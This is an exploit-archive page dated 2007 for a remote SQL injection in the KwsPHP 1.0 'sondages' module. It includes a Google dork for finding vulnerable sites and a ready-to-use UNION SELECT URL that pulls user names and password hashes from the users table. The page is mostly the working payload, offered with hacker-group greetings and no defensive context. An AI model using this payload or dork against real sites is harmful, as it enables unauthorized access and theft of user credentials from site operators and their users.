KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability
# Published : 2007-09-18
# Author : Houssamix
# Previous Title : phpsyncml <= 0.1.2 Remote File Include Vulnerabilities
# Next Title : modifyform (modifyform.html) Remote File Inclusion Vulnerability

#########################################################################
    KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site: http://kws.koogar.org/
## Dork : inurl:index.php?mod=sondages


## EXPLOITS :

http://server.com/Path/index.php?mod=sondages&do=results&id=-1%20union%20select%201,2,3,concat(pseudo,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20where%20id=1--



## GREETZ  : All members no-hack

#########################################################################
         KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
######################################################################### 

# www.Syue.com [2007-09-18]